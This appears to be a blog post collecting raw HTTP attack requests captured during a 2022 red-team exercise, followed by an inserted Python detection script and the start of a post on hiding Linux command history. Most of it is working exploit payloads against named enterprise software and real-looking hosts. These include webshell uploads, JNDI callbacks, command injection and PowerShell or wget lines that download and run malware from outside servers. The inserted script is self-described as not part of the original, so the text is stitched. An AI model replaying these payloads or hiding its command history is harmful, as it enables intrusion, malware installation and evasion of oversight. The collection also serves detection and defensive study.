Wednesday, July 27, 2022

Some of the payloads captured during the 2022 HVV exercise

Everything below is packets recorded in the back end of various security appliances (no sensitive information is included; in practice these attacks also failed). The blank part at the end means this will continue to be updated (or it may never be updated again).

=============================================================

Landray OA pre-auth code execution vulnerability; this is an undisclosed vulnerability (S3100028163)

POST /data/sys-common/treexml.tmpl HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)
Host:vpn.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:168

s_bean=ruleFormulaValidate&script=try {String cmd = "ping www.baidu.com";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}


=============================================================



FastJson exploitation attempt

POST / HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:application/json; charset=utf-8
Content-Length:115

{
   "@type":"org.apache.shiro.jndi.JndiObjectFactory",
   "resourceName":"rmi://qNWA2Gls.dflqxk.ceye.io/Exploit"
}


===============================================================


fastjson (S2019010052)

POST / HTTP/1.1
User-Agent:Mozilla/5.0 (Windows NT 6.1; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Type:application/json; charset=utf-8
Content-Length:258

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://5ltnibIi.dflqxk.ceye.io/Exploit",
        "autoCommit":true
    }
}


==============================================================

eYou mail system remote code execution (S3000009837)

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Host:test.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:25

type='|cat /etc/passwd||'



==============================================================

Qizhi bastion host SQL injection vulnerability

GET /audit/gui_detail_view.php?token=1&id=\&uid=,chr(97)) or 1: print chr(121)+chr(101)+chr(115)
#&login=shterm HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Length:0



==============================================================

Weaver OA E-cology file upload (/page/exportImport/uploadOperation.jsp)(S3100023488)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Content-Length:288

--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="pwue.jsp"
Content-Type: application/octet-stream

<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--



==============================================================

Weaver OA9 pre-auth arbitrary file upload (S3000009793)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Content-Length:288

--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="pwue.jsp"
Content-Type: application/octet-stream

<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--



==============================================================

Tongda OA v11.7 auth_mobi.php arbitrary user login vulnerability (S3100028588)

GET /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Length:0



==============================================================

Tongda OA file inclusion (S2020010015)

POST /ispirit/interface/gateway.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:43

json={"url":"/general/../../mysql5/my.ini"}




==============================================================

Tongda OA office system, report_bi.func.php, dataset_id parameter SQL injection vulnerability (S3100023434)

POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:113

_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&



==============================================================

ThinkCMF arbitrary content inclusion vulnerability (S2020091501)

GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
Host:202.96.191.173:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type:application/json
Accept-Encoding:gzip
Connection:close




==============================================================

Yonyou GRP-u8 SQL injection, allows command execution (S3000009903)

POST /Proxy HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:348

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>




==============================================================

Ruijie EWEB remote code execution (S2120090999)

POST /guest_auth/guestIsUp.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:63

mac=1&ip=127.0.0.1|echo 'wkuqchdkhiuasborjbtn' > rqoojwfuwo.txt



==============================================================

Coremail disclosed vulnerability that allows the configuration to be read directly (S2019010019)

GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:preview.dongfeng-nissan.com.cn
Content-Length:0




==============================================================

ShopXO arbitrary file read vulnerability (CNVD-2021-15822)(S3100024378)

GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)
Host:preview.dongfeng-nissan.com.cn
Content-Length:0




==============================================================

Zyxel firewall command injection vulnerability (CVE-2022-30525)(S3100024936)

POST /ztp/cgi-bin/handler HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:vpn.dongfeng-nissan.com.cn
Content-Type:application/json
Content-Length:142

{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl http://Z2i9EVbB.dflqxk.ceye.io;","data":"hi"}





==============================================================

WebLogic exploitation or scanning (D11236926c9)

GET /_async/AsyncResponseService HTTP/1.1
Host:erp-ct.dfsouth.com
User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept:*/*
Connection:keep-alive


==============================================================

Dynamicweb cloud e-commerce system unauthorized user creation vulnerability (CVE-2022-25369)

GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:vpn.dongfeng-nissan.com.cn
Content-Length:0




==============================================================

ThinkPHP 5.x remote code execution (S2020091901)

GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
Host:202.96.191.161:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Encoding:gzip
Connection:close


==============================================================

Apache HTTP Server remote command execution (CVE-2021-41773)(S3000010931)

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host:202.96.191.161:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length:33
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip
Connection:close


==============================================================

XML external entity injection (D111751fdae)

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host:58.248.167.75:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length:314
Content-Type:application/xml
Accept-Encoding:gzip
Connection:close

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>



==============================================================

WebLogic deserialization remote code execution vulnerability (CVE-2019-2725)(S2020041008)

POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.232:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
cmd:powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe');start %SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe
Content-Length:206204
Host:202.96.191.232:7001

<?xml version="1.0" encoding="utf-8" ?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:wsa="http://www.w3.org/2005/08/addressing"
    xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>



--------------------------------------------------------------------------------------------------------


POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:913
Host:202.96.191.185:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>


----------------------------------------------------------------------------------

POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:915
Host:202.96.191.185:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe');start %SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>


==============================================================

WebLogic authentication bypass (CVE-2020-14883)(S2020102903)

POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host:210.21.81.137:7001
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection:close
Content-Length:157
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip

_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://178.20.40.200/wbw.xml")



==============================================================

WebLogic deserialization remote code execution vulnerability (CVE-2017-10271)(S3000008711)

POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:913
Host:202.96.191.185:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>



==============================================================

Attack attempt against Hikvision using CVE-2021-36260 (S3000011160)

PUT /SDK/webLanguage HTTP/1.1
Host:202.96.191.232:81
User-Agent:Go-http-client/1.1
Content-Length:102
Accept:*/*
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,sv;q=0.8
Content-Type:application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With:XMLHttpRequest

<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp/ && cd /var/tmp/ && cd /var/run/)</language>



==============================================================

ThinkPHP remote code execution (S2020060403)

GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
Connection:Keep-Alive
Accept:*/*
Accept-Language:zh-cn
Referer:http://210.21.81.157:8087/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:210.21.81.157:8087



==============================================================

Elasticsearch unauthorized access (S3100024705)

GET /_cat/indices?format=json&h=index HTTP/1.1
Host:202.96.191.232:9200
Accept:*/*
Accept-Encoding:gzip, deflate, br
Connection:keep-alive
User-Agent:python-httpx/0.21.1




==============================================================

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API remote command execution (S3100024329)

POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding:identity
Content-Length:644
Accept-Language:en-us
Host:202.96.191.232:90
Accept:*/*
User-Agent:Mozila/5.0
Connection:close
Cache-Control:max-age=0
Content-Type:text/xml
Authorization:Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=

<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>




==============================================================

XXL-JOB unauthorized remote code execution vulnerability (S3100023062)

POST /run HTTP/1.1
Host:202.96.191.232:9999
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Content-Length:334
Accept:*/*
Accept-Language:en-US,en;q=0.5
Connection:close
Content-Type:application/json
Accept-Encoding:gzip
Connection:close

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "calc",
  "glueUpdatetime": 1658940033024,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}




==============================================================

Zhongyuan Qilin iAudit bastion host remote command execution vulnerability (get_luser_by_sshport.php)(S3100023318)

GET /get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20md5(ocuswpeelc);unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/ocuswpeelc.php;&clientport=1 HTTP/1.1
Host:210.21.81.165
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip





==============================================================

Qi An Xin NS-NGFW (Netentsec) firewall pre-auth remote code execution (S3000009856)

POST /directdata/direct/router HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Content-Length:200
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(tcynfdguxq);unlink(__FILE__);?>' >/var/www/html/tcynfdguxq.php"]}],"type":"rpc","tid":17}




==============================================================

Jenkins remote code execution (CVE-2019-1003000)(S2020070703)

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27sqqx%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip




==============================================================

Detected SQL injection attack against Yonyou U8 OA test.jsp (S3000009930)

GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(204218669)) HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip




==============================================================

Yonyou Shikong KSOA pre-auth file upload vulnerability; this is an undisclosed vulnerability (S3100028170)

POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=9693326082.jsp HTTP/1.1
Host:mam.dongfeng-nissan.com.cn
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length:171
Accept:*/*
Connection:close

<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("OTY5MzMyNjA4Mg=="))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>




==============================================================

Yonyou NC file upload vulnerability; at the time the detection was published it was a 0-day and no corresponding patch was found. (S3100029010)

POST /aim/equipmap/accept.jsp HTTP/1.1
Host:202.96.191.196
User-Agent:python-requests/2.28.0
Accept-Encoding:gzip, deflate
Accept:*/*
Connection:keep-alive
Content-Type:multipart/form-data; boundary=---------------------------16314487820932200903769468567
Content-Length:535

-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="222222.txt"
Content-Type: text/plain

<%out.println("bea86d66a5278f9e6fa1112d2e2fcebf");%>
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"

\webapps
c_web80900fd668c51631353aca37fc1f829.jsp
-----------------------------16314487820932200903769468567--




==============================================================

Weaver E-office do_excel.php arbitrary file write vulnerability

PoC

POST /www/general/charge/charge_list/do_excel.php HTTP/1.1
Host:xxx.com
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length:34
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type:application/x-www-form-urlencoded
Referer:http://www.baidu.com/
Accept-Encoding:gzip

html=<?php system($_POST[pass]);?>



==============================================================

Weaver E-cology file upload vulnerability

Affected products: 8.0/9.0, versions below 10.47, and other versions

Exploitation status: exploited in the wild

Background: Weaver E-cology file upload vulnerability.

Vulnerability details: first send the upload request

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: target
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843
Accept-Encoding:gzip
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
Content-Length: 437

-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="secId"
Content-Type: text/plain

1
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="Filedata"; filename="log.txt"

success
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="plandetailid"

1
-----------------------------34533880461293314163770424843--

Then the file is released under the web root path; in the following request, replace the fileid accordingly.

POST /OfficeServer HTTP/1.1
Host: target
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843
Accept-Encoding:gzip
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
Content-Length: 437

-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="success"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'1015543'}
-----------------------------34533880461293314163770424843--




==============================================================


(Suspected 0-day) Yonyou NC 6.5 file upload vulnerability; at the time the detection was published it was a 0-day and no corresponding patch was found. (S3100029005)

POST /uapim/upload/grouptemplet?groupid=2&fileType=jsp HTTP/1.1
Host:202.96.191.196
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding:gzip, deflate
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Length:304

------WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Disposition: form-data; name="upload"; filename="whoami.jsp"
Content-Type: application/octet-stream

TEST123
------WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Disposition: form-data; name="submit"

submit
------WebKitFormBoundarymMgLJdk18SQHBnpj--
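
As an added example (not part of the original post, and not any vendor's detection engine), here is a small Python triage script that tags captured raw HTTP requests with the attack classes listed above and pulls out any out-of-band callback hosts that are worth blocking at egress. The sample requests and the oob.attacker.example host are constructed placeholders modelled on the captures, not copied from the logs.

```python
import re
from typing import Dict, List, Tuple

# Detection signatures for the request classes that appear in the captures above.
# Each pattern is matched against the full raw request (request line, headers and body).
SIGNATURES: List[Tuple[str, "re.Pattern[str]"]] = [
    # FastJson autoType gadget whose JNDI name points at an attacker-controlled server
    ("fastjson_autotype_jndi",
     re.compile(r'"@type"\s*:\s*"[^"]+".*?"(?:resourceName|dataSourceName)"\s*:\s*"(?:rmi|ldap)://', re.S)),
    # ThinkPHP 5.x invokefunction probe
    ("thinkphp_invokefunction", re.compile(r'\\think\\app/invokefunction', re.I)),
    # Apache CVE-2021-41773: encoded dot-dot traversal under /cgi-bin/
    ("apache_cve_2021_41773_traversal", re.compile(r'/cgi-bin/(?:\.%2e/)+', re.I)),
    # XXE: external entity declared with a file/http/ftp URI
    ("xxe_external_entity", re.compile(r'<!ENTITY\s+\w+\s+SYSTEM\s+"(?:file|http|ftp):', re.I)),
    # WebLogic WorkContext XMLDecoder gadget (CVE-2017-10271 / CVE-2019-2725 style)
    ("weblogic_workcontext_processbuilder",
     re.compile(r'<work:WorkContext.*?java\.lang\.ProcessBuilder', re.S)),
    # Shell command substitution or command chaining inside a parameter value
    ("os_command_injection", re.compile(r'\$\([^)]+\)|[;|]\s*(?:cat|curl|wget|echo)\s')),
    # Multipart upload whose file name ends in .jsp
    ("jsp_webshell_upload", re.compile(r'filename="[^"]*\.jsp"', re.I)),
]

# Hostnames of rmi/ldap/http URLs: candidate out-of-band callback infrastructure.
OOB_HOST = re.compile(r'(?:rmi|ldap|https?)://([A-Za-z0-9.-]+)')


def build_request(method: str, path: str, headers: Dict[str, str], body: str = "") -> str:
    """Assemble a raw HTTP/1.1 request string from its parts (used for the samples below)."""
    head = f"{method} {path} HTTP/1.1\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return head + "\r\n" + body


def classify(raw_request: str) -> List[str]:
    """Return the names of all signatures that match the raw request, in table order."""
    return [name for name, pattern in SIGNATURES if pattern.search(raw_request)]


def extract_oob_hosts(raw_request: str) -> List[str]:
    """Callback hostnames found in the request line or body.

    Headers are deliberately skipped so that Host/Referer values are not reported.
    """
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    return sorted(set(OOB_HOST.findall(request_line + "\n" + body)))


# Constructed sample requests modelled on the captures (10.0.0.5 and oob.attacker.example are placeholders).
SAMPLE_THINKPHP = build_request(
    "GET",
    r"/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21",
    {"Host": "10.0.0.5"},
)
SAMPLE_FASTJSON = build_request(
    "POST", "/", {"Host": "10.0.0.5", "Content-Type": "application/json"},
    '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://oob.attacker.example/Exploit","autoCommit":true}}',
)
SAMPLE_APACHE = build_request("POST", "/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh", {"Host": "10.0.0.5"})
SAMPLE_XXE = build_request(
    "POST", "/Autodiscover/Autodiscover.xml", {"Host": "10.0.0.5", "Content-Type": "application/xml"},
    '<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><Request>&xxe;</Request>',
)
SAMPLE_BENIGN = build_request("GET", "/index.php?s=/index/list&page=2", {"Host": "10.0.0.5"})

if __name__ == "__main__":
    samples = [("thinkphp", SAMPLE_THINKPHP), ("fastjson", SAMPLE_FASTJSON),
               ("apache", SAMPLE_APACHE), ("xxe", SAMPLE_XXE), ("benign", SAMPLE_BENIGN)]
    for label, req in samples:
        print(f"{label:9s} tags={classify(req)} oob={extract_oob_hosts(req)}")
```

Feeding the script the requests recorded above instead of the samples gives one tag list per alert, and the extracted hosts are the ones to check against proxy and DNS egress logs.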

======================================================

Saturday, July 23, 2022

Hide your Linux command-line history

Where this article comes from: yesterday, during an interview with a senior engineer from Baidu, I was asked about this. I had never run into this scenario before and was completely stumped, so afterwards I searched the web and, wow, learned something new: it turns out you can do this.

Body

------------

If you are a Linux command-line user, there may be times when you do not want certain commands recorded in your command-line history. There can be many reasons: for example, you hold a position at your company that gives you privileges you do not want others to abuse, or there are some especially critical commands you do not want to run by mistake while browsing the history list.

